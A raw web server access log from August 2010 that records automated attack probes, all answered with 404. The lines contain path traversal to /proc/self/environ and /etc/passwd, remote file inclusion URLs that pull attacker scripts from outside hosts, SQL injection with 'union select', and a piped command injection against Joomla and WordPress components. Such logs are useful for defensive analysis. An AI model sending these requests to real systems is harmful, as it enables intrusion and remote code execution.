208.64.68.228 - - [22/Aug/2010:13:40:31 -0400] "GET /log//index2.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296
184.107.48.236 - - [22/Aug/2010:13:41:12 -0400] "GET //index.php?option=com_fabrik&view=table&tableid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
184.107.48.236 - - [22/Aug/2010:13:41:50 -0400] "GET //index.php?option=com_fabrik&view=table&tableid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
74.52.122.70 - - [22/Aug/2010:13:42:17 -0400] "GET /log/errors.php?error=http://www.allenbacher.eu/test?%0D? HTTP/1.1" 404 295
74.52.122.70 - - [22/Aug/2010:13:42:17 -0400] "GET /errors.php?error=http://www.allenbacher.eu/test?%0D? HTTP/1.1" 404 291
74.52.122.70 - - [22/Aug/2010:13:42:18 -0400] "GET /errors.php?error=http://www.spread.xx/xx.xx??&u=x HTTP/1.1" 404 291
74.52.122.70 - - [22/Aug/2010:13:42:20 -0400] "GET /log/errors.php?error=http://www.spread.xx/xx.xx??&u=x HTTP/1.1" 404 295
92.43.201.28 - - [22/Aug/2010:13:42:48 -0400] "GET /log/sdaglobal.org-access_log.3%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://iimc-consultingclub.com/error/Ckrid1.txt?? HTTP/1.1" 404 376
92.43.201.28 - - [22/Aug/2010:13:42:48 -0400] "GET /log/sdaglobal.org-access_log.3%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 376
81.19.215.12 - - [22/Aug/2010:13:43:05 -0400] "POST /contact.php HTTP/1.1" 404 292
81.19.215.12 - - [22/Aug/2010:13:43:05 -0400] "POST /log/contact.php HTTP/1.1" 404 296
81.19.215.12 - - [22/Aug/2010:13:43:07 -0400] "POST /log/sdaglobal.org-access_log.4/contact.php HTTP/1.1" 404 323
81.19.215.12 - - [22/Aug/2010:13:43:24 -0400] "POST /log/chinese.sdaglobal.org-access_log.4/contact.php HTTP/1.1" 404 331
120.50.34.74 - - [22/Aug/2010:13:43:38 -0400] "POST /log/contact.php HTTP/1.1" 404 296
120.50.34.74 - - [22/Aug/2010:13:43:38 -0400] "POST /contact.php HTTP/1.1" 404 292
64.15.156.75 - - [22/Aug/2010:13:43:43 -0400] "GET /log/sdaglobal.org-access_log//index.php?option=com_fabrik&view=table&tableid=13+union+select+1--' HTTP/1.1" 404 320
64.15.156.75 - - [22/Aug/2010:13:43:43 -0400] "GET //index.php?option=com_fabrik&view=table&tableid=13+union+select+1--' HTTP/1.1" 404 291
64.15.156.75 - - [22/Aug/2010:13:43:43 -0400] "GET /log//index.php?option=com_fabrik&view=table&tableid=13+union+select+1--' HTTP/1.1" 404 295
141.211.109.120 - - [22/Aug/2010:13:44:57 -0400] "GET /log/sdaglobal.org-access_log.2//index.php?option=com_fabrik&mosConfig.absolute.path=http://www.ktsmile.com//administrator/components/com_virtuemart/ID-RFI.txt?? HTTP/1.1" 404 322
75.127.98.12 - - [22/Aug/2010:13:45:15 -0400] "GET /log/sdaglobal.org-access_log.1//index.php?option=com_s5clanroster&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322
75.127.98.12 - - [22/Aug/2010:13:45:15 -0400] "GET //index.php?option=com_s5clanroster&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
75.127.98.12 - - [22/Aug/2010:13:45:15 -0400] "GET /log//index.php?option=com_s5clanroster&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295
75.127.98.12 - - [22/Aug/2010:13:45:50 -0400] "GET /log/sdaglobal.org-access_log//index.php?option=com_s5clanroster&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320
84.21.8.208 - - [22/Aug/2010:13:45:55 -0400] "POST //contact.php HTTP/1.1" 404 293
84.21.8.208 - - [22/Aug/2010:13:45:55 -0400] "POST /log//contact.php HTTP/1.1" 404 297
84.21.8.208 - - [22/Aug/2010:13:45:55 -0400] "POST /log/sdaglobal.org-access_log.1//contact.php HTTP/1.1" 404 324
84.21.8.208 - - [22/Aug/2010:13:46:10 -0400] "POST //contact.php HTTP/1.1" 404 293
84.21.8.208 - - [22/Aug/2010:13:46:11 -0400] "POST /log//contact.php HTTP/1.1" 404 297
84.21.8.208 - - [22/Aug/2010:13:46:11 -0400] "POST /log/sdaglobal.org-access_log%20%20//contact.php HTTP/1.1" 404 324
85.17.103.25 - - [22/Aug/2010:13:46:15 -0400] "GET /log/sdaglobal.org-access_log//index.php?option=com_fabrik&mosConfig.absolute.path=http://www.ktsmile.com//administrator/components/com_virtuemart/myid.jpg? HTTP/1.1" 404 320
85.17.103.25 - - [22/Aug/2010:13:46:16 -0400] "GET //index.php?option=com_fabrik&mosConfig.absolute.path=http://www.ktsmile.com//administrator/components/com_virtuemart/myid.jpg? HTTP/1.1" 404 291
85.17.103.25 - - [22/Aug/2010:13:46:16 -0400] "GET /log//index.php?option=com_fabrik&mosConfig.absolute.path=http://www.ktsmile.com//administrator/components/com_virtuemart/myid.jpg? HTTP/1.1" 404 295
84.21.8.208 - - [22/Aug/2010:13:46:46 -0400] "POST //contact.php HTTP/1.1" 404 293
84.21.8.208 - - [22/Aug/2010:13:46:47 -0400] "POST /log//contact.php HTTP/1.1" 404 297
84.21.8.208 - - [22/Aug/2010:13:46:47 -0400] "POST /log/sdaglobal.org-access_log//contact.php HTTP/1.1" 404 322
89.187.142.115 - - [22/Aug/2010:13:47:29 -0400] "GET /log/sdaglobal.org-access_log//index.php?option=com_fabrik&view=table&tableid=13+union+select+1--' HTTP/1.1" 404 320
89.187.142.115 - - [22/Aug/2010:13:47:29 -0400] "GET //index.php?option=com_fabrik&view=table&tableid=13+union+select+1--' HTTP/1.1" 404 291
89.187.142.115 - - [22/Aug/2010:13:47:29 -0400] "GET /log//index.php?option=com_fabrik&view=table&tableid=13+union+select+1--' HTTP/1.1" 404 295
207.218.240.18 - - [22/Aug/2010:13:49:20 -0400] "GET /log/sdaglobal.org-access_log//index.php?option=com_fabrik&mosConfig.absolute.path=http://www.ktsmile.com//administrator/components/com_virtuemart/myid.jpg? HTTP/1.1" 404 320
207.218.240.18 - - [22/Aug/2010:13:49:20 -0400] "GET //index.php?option=com_fabrik&mosConfig.absolute.path=http://www.ktsmile.com//administrator/components/com_virtuemart/myid.jpg? HTTP/1.1" 404 291
207.218.240.18 - - [22/Aug/2010:13:49:20 -0400] "GET /log//index.php?option=com_fabrik&mosConfig.absolute.path=http://www.ktsmile.com//administrator/components/com_virtuemart/myid.jpg? HTTP/1.1" 404 295
207.46.13.41 - - [22/Aug/2010:13:49:20 -0400] "GET /log/zjjs.sdaglobal.org-access_log.4 HTTP/1.1" 200 58995
74.50.85.229 - - [22/Aug/2010:13:49:54 -0400] "GET /log/sdaglobal.org-access_log//index.php?option=com_fabrik&mosConfig.absolute.path=http://www.ktsmile.com//administrator/components/com_virtuemart/ID-RFI.txt?? HTTP/1.1" 404 320
74.50.85.229 - - [22/Aug/2010:13:49:54 -0400] "GET //index.php?option=com_fabrik&mosConfig.absolute.path=http://www.ktsmile.com//administrator/components/com_virtuemart/ID-RFI.txt?? HTTP/1.1" 404 291
109.86.145.204 - - [22/Aug/2010:13:49:56 -0400] "GET /log/sdaglobal.org-access_log.2//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322
109.86.145.204 - - [22/Aug/2010:13:49:56 -0400] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
109.86.145.204 - - [22/Aug/2010:13:49:56 -0400] "GET /log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295
74.50.85.229 - - [22/Aug/2010:13:49:57 -0400] "GET /log//index.php?option=com_fabrik&mosConfig.absolute.path=http://www.ktsmile.com//administrator/components/com_virtuemart/ID-RFI.txt?? HTTP/1.1" 404 295
109.86.145.204 - - [22/Aug/2010:13:50:32 -0400] "GET /log/sdaglobal.org-access_log.2//?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313
92.43.201.28 - - [22/Aug/2010:13:51:25 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://iimc-consultingclub.com/error/Ckrid1.txt?? HTTP/1.1" 404 343
92.43.201.28 - - [22/Aug/2010:13:51:25 -0400] "GET /log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://iimc-consultingclub.com/error/Ckrid1.txt?? HTTP/1.1" 404 347
92.43.201.28 - - [22/Aug/2010:13:51:26 -0400] "GET /log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 347
92.43.201.28 - - [22/Aug/2010:13:51:26 -0400] "GET /log/sdaglobal.org-access_log.4%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://iimc-consultingclub.com/error/Ckrid1.txt?? HTTP/1.1" 404 376
92.43.201.28 - - [22/Aug/2010:13:51:26 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 343
92.43.201.28 - - [22/Aug/2010:13:51:27 -0400] "GET /log/sdaglobal.org-access_log.4%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 376
109.86.145.204 - - [22/Aug/2010:13:53:12 -0400] "GET /log/sdaglobal.org-access_log.2//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322
188.127.248.175 - - [22/Aug/2010:13:53:18 -0400] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
188.127.248.175 - - [22/Aug/2010:13:53:24 -0400] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
64.15.156.75 - - [22/Aug/2010:13:53:33 -0400] "GET /log/sdaglobal.org-access_log.2//index.php?option=com_fabrik&view=table&tableid=13+union+select+1--' HTTP/1.1" 404 322
85.17.103.25 - - [22/Aug/2010:13:56:03 -0400] "GET /log/sdaglobal.org-access_log.2//index.php?option=com_fabrik&mosConfig.absolute.path=http://www.ktsmile.com//administrator/components/com_virtuemart/myid.jpg? HTTP/1.1" 404 322
74.52.122.70 - - [22/Aug/2010:13:56:20 -0400] "GET /errors.php?error=http://www.allenbacher.eu/test?%0D? HTTP/1.1" 404 291
74.52.122.70 - - [22/Aug/2010:13:56:21 -0400] "GET /log/errors.php?error=http://www.allenbacher.eu/test?%0D? HTTP/1.1" 404 295
74.52.122.70 - - [22/Aug/2010:13:56:21 -0400] "GET /errors.php?error=http://www.spread.xx/xx.xx??&u=x HTTP/1.1" 404 291
184.107.48.236 - - [22/Aug/2010:13:56:22 -0400] "GET /log/sdaglobal.org-access_log//index.php?option=com_fabrik&view=table&tableid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320
184.107.48.236 - - [22/Aug/2010:13:56:22 -0400] "GET //index.php?option=com_fabrik&view=table&tableid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
74.52.122.70 - - [22/Aug/2010:13:56:22 -0400] "GET /log/errors.php?error=http://www.spread.xx/xx.xx??&u=x HTTP/1.1" 404 295
184.107.48.236 - - [22/Aug/2010:13:56:22 -0400] "GET /log//index.php?option=com_fabrik&view=table&tableid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295
184.107.48.236 - - [22/Aug/2010:13:56:41 -0400] "GET /log/sdaglobal.org-access_log.2//index.php?option=com_fabrik&view=table&tableid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322
184.107.48.236 - - [22/Aug/2010:13:56:41 -0400] "GET //index.php?option=com_fabrik&view=table&tableid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
184.107.48.236 - - [22/Aug/2010:13:56:42 -0400] "GET /log//index.php?option=com_fabrik&view=table&tableid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295
89.187.142.115 - - [22/Aug/2010:13:57:28 -0400] "GET /log/sdaglobal.org-access_log.2//index.php?option=com_fabrik&view=table&tableid=13+union+select+1--' HTTP/1.1" 404 322
188.40.137.140 - - [22/Aug/2010:13:58:39 -0400] "POST //contact.php HTTP/1.1" 404 293
188.40.137.140 - - [22/Aug/2010:13:58:39 -0400] "POST /log/sdaglobal.org-access_log.1//contact.php HTTP/1.1" 404 324
188.40.137.140 - - [22/Aug/2010:13:58:40 -0400] "POST /log//contact.php HTTP/1.1" 404 297
92.43.201.28 - - [22/Aug/2010:13:58:51 -0400] "GET /log/sdaglobal.org-access_log.3%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://iimc-consultingclub.com/error/Ckrid1.txt?? HTTP/1.1" 404 376
92.43.201.28 - - [22/Aug/2010:13:58:52 -0400] "GET /log/sdaglobal.org-access_log.3%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 376
184.107.48.236 - - [22/Aug/2010:13:59:24 -0400] "GET /log/sdaglobal.org-access_log//index.php?option=com_fabrik&view=table&tableid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320
207.218.240.18 - - [22/Aug/2010:14:00:20 -0400] "GET /log/sdaglobal.org-access_log.2//index.php?option=com_fabrik&mosConfig.absolute.path=http://www.ktsmile.com//administrator/components/com_virtuemart/myid.jpg? HTTP/1.1" 404 322
109.86.145.204 - - [22/Aug/2010:14:00:48 -0400] "GET /log/sdaglobal.org-access_log.1//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322
67.195.111.232 - - [22/Aug/2010:14:03:52 -0400] "GET /log/health.hitechemall.com-error_log HTTP/1.0" 200 781
74.50.85.229 - - [22/Aug/2010:14:04:58 -0400] "GET /log/sdaglobal.org-access_log.2//index.php?option=com_fabrik&mosConfig.absolute.path=http://www.ktsmile.com//administrator/components/com_virtuemart/ID-RFI.txt?? HTTP/1.1" 404 322
91.204.116.109 - - [22/Aug/2010:14:05:15 -0400] "GET /log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294
91.204.116.109 - - [22/Aug/2010:14:05:16 -0400] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290
91.204.116.109 - - [22/Aug/2010:14:05:19 -0400] "GET /log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294
91.204.116.109 - - [22/Aug/2010:14:05:21 -0400] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290
91.204.116.109 - - [22/Aug/2010:14:06:03 -0400] "GET /log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294
91.204.116.109 - - [22/Aug/2010:14:06:03 -0400] "GET /log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294
91.204.116.109 - - [22/Aug/2010:14:06:04 -0400] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290
91.204.116.109 - - [22/Aug/2010:14:06:04 -0400] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290
212.51.183.137 - - [22/Aug/2010:14:06:11 -0400] "GET /log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294
212.51.183.137 - - [22/Aug/2010:14:06:11 -0400] "GET /log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294
92.43.201.28 - - [22/Aug/2010:14:06:12 -0400] "GET /log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://iimc-consultingclub.com/error/Ckrid1.txt?? HTTP/1.1" 404 347
212.51.183.137 - - [22/Aug/2010:14:06:13 -0400] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290
212.51.183.137 - - [22/Aug/2010:14:06:13 -0400] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290
92.43.201.28 - - [22/Aug/2010:14:06:13 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://iimc-consultingclub.com/error/Ckrid1.txt?? HTTP/1.1" 404 343
92.43.201.28 - - [22/Aug/2010:14:06:13 -0400] "GET /log/sdaglobal.org-access_log.4%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://iimc-consultingclub.com/error/Ckrid1.txt?? HTTP/1.1" 404 376
92.43.201.28 - - [22/Aug/2010:14:06:14 -0400] "GET /log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 347
92.43.201.28 - - [22/Aug/2010:14:06:14 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 343
92.43.201.28 - - [22/Aug/2010:14:06:14 -0400] "GET /log/sdaglobal.org-access_log.4%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 376
174.121.166.146 - - [22/Aug/2010:14:07:33 -0400] "GET //index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://paps.fi/testi/files/respon1.txt??? HTTP/1.1" 404 291
174.121.166.146 - - [22/Aug/2010:14:07:34 -0400] "GET /log/sdaglobal.org-access_log%20%20//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://paps.fi/testi/files/respon1.txt??? HTTP/1.1" 404 322
174.121.166.146 - - [22/Aug/2010:14:07:36 -0400] "GET /log//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://paps.fi/testi/files/respon1.txt??? HTTP/1.1" 404 295
184.107.48.236 - - [22/Aug/2010:14:07:42 -0400] "GET /log/sdaglobal.org-access_log.2//index.php?option=com_fabrik&view=table&tableid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322
82.146.53.112 - - [22/Aug/2010:14:07:58 -0400] "POST //contact.php HTTP/1.1" 404 293
82.146.53.112 - - [22/Aug/2010:14:07:58 -0400] "POST /log/sdaglobal.org-access_log.1//contact.php HTTP/1.1" 404 324
82.146.53.112 - - [22/Aug/2010:14:07:58 -0400] "POST /log//contact.php HTTP/1.1" 404 297
174.121.166.146 - - [22/Aug/2010:14:08:54 -0400] "GET /log/sdaglobal.org-access_log.2%20%20//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://paps.fi/testi/files/respon1.txt??? HTTP/1.1" 404 324
72.52.228.36 - - [22/Aug/2010:14:09:42 -0400] "GET /log//index2.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296
72.52.228.36 - - [22/Aug/2010:14:09:45 -0400] "GET //index2.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292
76.97.16.122 - - [22/Aug/2010:14:10:38 -0400] "POST //contact.php HTTP/1.1" 404 293
76.97.16.122 - - [22/Aug/2010:14:10:40 -0400] "POST /log/sdaglobal.org-access_log.1//contact.php HTTP/1.1" 404 324
76.97.16.122 - - [22/Aug/2010:14:10:44 -0400] "POST /log//contact.php HTTP/1.1" 404 297
72.52.228.36 - - [22/Aug/2010:14:11:08 -0400] "GET //index2.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292
72.52.228.36 - - [22/Aug/2010:14:11:10 -0400] "GET //index2.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292
72.52.228.36 - - [22/Aug/2010:14:12:34 -0400] "GET //index2.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292
72.52.228.36 - - [22/Aug/2010:14:12:40 -0400] "GET //index2.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292
92.43.201.28 - - [22/Aug/2010:14:14:29 -0400] "GET /log/sdaglobal.org-access_log.3%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://iimc-consultingclub.com/error/Ckrid1.txt?? HTTP/1.1" 404 376
92.43.201.28 - - [22/Aug/2010:14:14:29 -0400] "GET /log/sdaglobal.org-access_log.3%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 376
188.127.248.175 - - [22/Aug/2010:14:16:35 -0400] "GET /log/sdaglobal.org-access_log.2//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322
188.127.248.175 - - [22/Aug/2010:14:16:36 -0400] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
188.127.248.175 - - [22/Aug/2010:14:16:36 -0400] "GET /log//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295
72.52.228.36 - - [22/Aug/2010:14:16:41 -0400] "GET /log/sdaglobal.org-access_log.3//index2.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 323
72.52.228.36 - - [22/Aug/2010:14:16:41 -0400] "GET //index2.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292
72.52.228.36 - - [22/Aug/2010:14:16:41 -0400] "GET /log//index2.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296
76.97.16.122 - - [22/Aug/2010:14:16:43 -0400] "POST //contact.php HTTP/1.1" 404 293
188.127.248.175 - - [22/Aug/2010:14:16:44 -0400] "GET /log/sdaglobal.org-access_log.2//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322
76.97.16.122 - - [22/Aug/2010:14:16:44 -0400] "POST /log/sdaglobal.org-access_log.1%20%20//contact.php HTTP/1.1" 404 326
188.127.248.175 - - [22/Aug/2010:14:16:44 -0400] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
188.127.248.175 - - [22/Aug/2010:14:16:45 -0400] "GET /log//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295
188.127.248.175 - - [22/Aug/2010:14:16:50 -0400] "GET /log/sdaglobal.org-access_log.1//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322
72.52.228.36 - - [22/Aug/2010:14:16:52 -0400] "GET /log/sdaglobal.org-access_log.3//index2.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 323
72.52.228.36 - - [22/Aug/2010:14:16:52 -0400] "GET //index2.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292
72.52.228.36 - - [22/Aug/2010:14:16:52 -0400] "GET /log//index2.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296
76.97.16.122 - - [22/Aug/2010:14:16:53 -0400] "POST /log//contact.php HTTP/1.1" 404 297
188.127.248.175 - - [22/Aug/2010:14:16:55 -0400] "GET /log/sdaglobal.org-access_log.1//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322
92.62.196.66 - - [22/Aug/2010:14:19:28 -0400] "POST /log/contact.php HTTP/1.1" 404 296
92.43.201.28 - - [22/Aug/2010:14:22:09 -0400] "GET /log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://iimc-consultingclub.com/error/Ckrid1.txt?? HTTP/1.1" 404 347
92.43.201.28 - - [22/Aug/2010:14:22:09 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://iimc-consultingclub.com/error/Ckrid1.txt?? HTTP/1.1" 404 343
92.43.201.28 - - [22/Aug/2010:14:22:09 -0400] "GET /log/sdaglobal.org-access_log.4%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://iimc-consultingclub.com/error/Ckrid1.txt?? HTTP/1.1" 404 376
92.43.201.28 - - [22/Aug/2010:14:22:10 -0400] "GET /log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 347
92.43.201.28 - - [22/Aug/2010:14:22:10 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 343
92.43.201.28 - - [22/Aug/2010:14:22:10 -0400] "GET /log/sdaglobal.org-access_log.4%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 376
76.97.16.122 - - [22/Aug/2010:14:22:53 -0400] "POST /log//contact.php HTTP/1.1" 404 297
76.97.16.122 - - [22/Aug/2010:14:22:53 -0400] "POST /log/sdaglobal.org-access_log.1%20%20//contact.php HTTP/1.1" 404 326
76.97.16.122 - - [22/Aug/2010:14:23:07 -0400] "POST //contact.php HTTP/1.1" 404 293
173.230.156.231 - - [22/Aug/2010:14:23:52 -0400] "GET /log//index.php?option=com_webeecomment&controller=/../../../../../../../../etc/passwd HTTP/1.1" 404 295
173.230.156.231 - - [22/Aug/2010:14:23:52 -0400] "GET //index.php?option=com_webeecomment&controller=/../../../../../../../../etc/passwd HTTP/1.1" 404 291
173.230.156.231 - - [22/Aug/2010:14:25:21 -0400] "GET //index.php?option=com_javoice&view=http://homert.100webspace.net/doc/flo1.txt??? HTTP/1.1" 404 291
173.230.156.231 - - [22/Aug/2010:14:25:21 -0400] "GET /log//index.php?option=com_javoice&view=http://homert.100webspace.net/doc/flo1.txt??? HTTP/1.1" 404 295
173.230.156.231 - - [22/Aug/2010:14:25:21 -0400] "GET //index.php?option=com_javoice&view=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 291
173.230.156.231 - - [22/Aug/2010:14:25:21 -0400] "GET /log//index.php?option=com_javoice&view=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 295
173.230.156.231 - - [22/Aug/2010:14:26:28 -0400] "GET /log//index.php?option=com_foobla_suggestions&controller=http://homert.100webspace.net/doc/flo1.txt??? HTTP/1.1" 404 295
173.230.156.231 - - [22/Aug/2010:14:26:28 -0400] "GET //index.php?option=com_foobla_suggestions&controller=http://homert.100webspace.net/doc/flo1.txt??? HTTP/1.1" 404 291
173.230.156.231 - - [22/Aug/2010:14:26:28 -0400] "GET /log//index.php?option=com_foobla_suggestions&controller=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 295
173.230.156.231 - - [22/Aug/2010:14:26:29 -0400] "GET //index.php?option=com_foobla_suggestions&controller=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 291
62.149.233.199 - - [22/Aug/2010:14:29:13 -0400] "GET /log/sdaglobal.org-access_log//index.php?option=com_rokdownloads&controller=http://galepo.webs.com/Ckrid1.txt?? HTTP/1.1" 404 320
72.52.228.36 - - [22/Aug/2010:14:29:24 -0400] "GET /log/sdaglobal.org-access_log.3//index2.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 323
72.52.228.36 - - [22/Aug/2010:14:29:25 -0400] "GET //index2.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292
72.52.228.36 - - [22/Aug/2010:14:29:25 -0400] "GET /log//index2.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296
72.52.228.36 - - [22/Aug/2010:14:29:33 -0400] "GET /log/sdaglobal.org-access_log.3//index2.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 323
72.52.228.36 - - [22/Aug/2010:14:29:33 -0400] "GET //index2.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292
72.52.228.36 - - [22/Aug/2010:14:29:33 -0400] "GET /log//index2.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296
